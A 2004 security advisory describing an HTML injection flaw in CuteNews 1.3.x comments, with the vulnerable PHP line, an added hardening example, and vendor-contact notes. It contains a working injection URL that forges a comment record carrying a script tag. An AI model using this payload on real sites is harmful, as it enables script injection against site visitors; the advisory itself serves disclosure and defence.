CuteNews version 1.3.x suffers from an HTML injection flaw in the commentary section.
1bed2be3a7e3553d352ea8e88aeacbb7a7dc51caa12eba604305e417a1450da1
original advisory: https://www.darkbicho.iberhosting.net/advisory-11.txt
-------------------------------------------------------------------------------------------------
:.: HTML injection in CuteNews :.:
PROGRAM: CuteNews
HOMEPAGE: https://cutephp.com/
VERSION: v1.3.x
BUG: HTML injection
DATE: 15/07/2004
AUTHOR: DarkBicho
web: https://www.darkbicho.tk
team: Security Wari Projects <www.swp-zone.org>
Email: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
CuteNews is a popular news publishing system, written in PHP by
CutePHP.
2.- vulnerability:
---------------
HTML injection in comments
File: /inc/Shows.inc.php
Line: 189
if(!$found){ fwrite($new_comments, "$id|>|$time|$name|$mail|$ip|$comments||\n"); }
The variable $id is not filtered before it is written into the comments file. Since "|" separates the fields of a record and a newline ends it, a crafted id can carry a complete forged record, comment body included, and inject HTML.
id of the news item = 1078525267
Example:
show_news.php?subaction=addcomment&name=DarkBich0&comments=https://www.darkbicho.tk&id=1078525267|>|1090074219|DarkBich0|none|127.0.0.1|<script>alert("DarkBicho");</script>||
:.: https://www.darkbicho.iberhosting.net/cutenews/cutenews.gif :.:
3.- Exploit:
--------
https://www.darkbicho.iberhosting.net/cutenews/
4.- SOLUTION:
--------
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the CuteNews website for updates and official release details.
5.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"PISCO IS AND WILL BE PERUVIAN"
6.- Contact
-------
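As an added example (not CuteNews code and not part of the original advisory), this is how the write at line 189 could be hardened: the id is validated as a plain number so it cannot carry the "|" and newline delimiters, and the free-text fields are escaped before they reach the file. Function names are hypothetical.

```php
<?php
// Added example, not CuteNews code: a hardened replacement for the unfiltered
// fwrite() at line 189 of /inc/Shows.inc.php. Function names are hypothetical.

// The stored record uses "|" as the field separator and "\n" as the record
// terminator, so an $id containing either lets the poster forge a whole record.
// Only a plain decimal news id is accepted.
function valid_news_id($id) {
    return is_string($id) && $id !== '' && ctype_digit($id);
}

// Free-text fields: remove the delimiters and escape HTML so nothing the
// poster controls can end a field, end a record, or run in a reader's browser.
function clean_field($value) {
    $value = str_replace(array("|", "\r", "\n"), " ", (string)$value);
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Build the record in the layout CuteNews writes, or return null if the
// id or timestamp is not acceptable.
function build_comment_record($id, $time, $name, $mail, $ip, $comments) {
    if (!valid_news_id($id) || !ctype_digit((string)$time)) {
        return null;
    }
    return $id . '|>|' . $time . '|' . clean_field($name) . '|'
         . clean_field($mail) . '|' . clean_field($ip) . '|'
         . clean_field($comments) . "||\n";
}

// The crafted id from the advisory fails valid_news_id(), so no record is built.
$forged_id = '1078525267|>|1090074219|DarkBich0|none|127.0.0.1|<script>alert("DarkBicho");</script>||';
var_dump(build_comment_record($forged_id, 1090074219, 'x', 'none', '127.0.0.1', 'hi'));

// A genuine comment is stored with any markup in the body escaped rather than
// written raw into the file.
$record = build_comment_record('1078525267', 1090074219, 'DarkBich0', 'none',
                               '127.0.0.1', '<b>hello</b>');
if ($record !== null) {
    echo $record;
    // fwrite($new_comments, $record); // the real call site; handle not opened here
}
```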
WEB: https://www.darkbicho.tk
EMAIL: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF ]----------------------------------------------
DarkBicho
Web: https://www.darkbicho.tk
"My only crime is seeing what others cannot see"
---------------------- The End ----------------------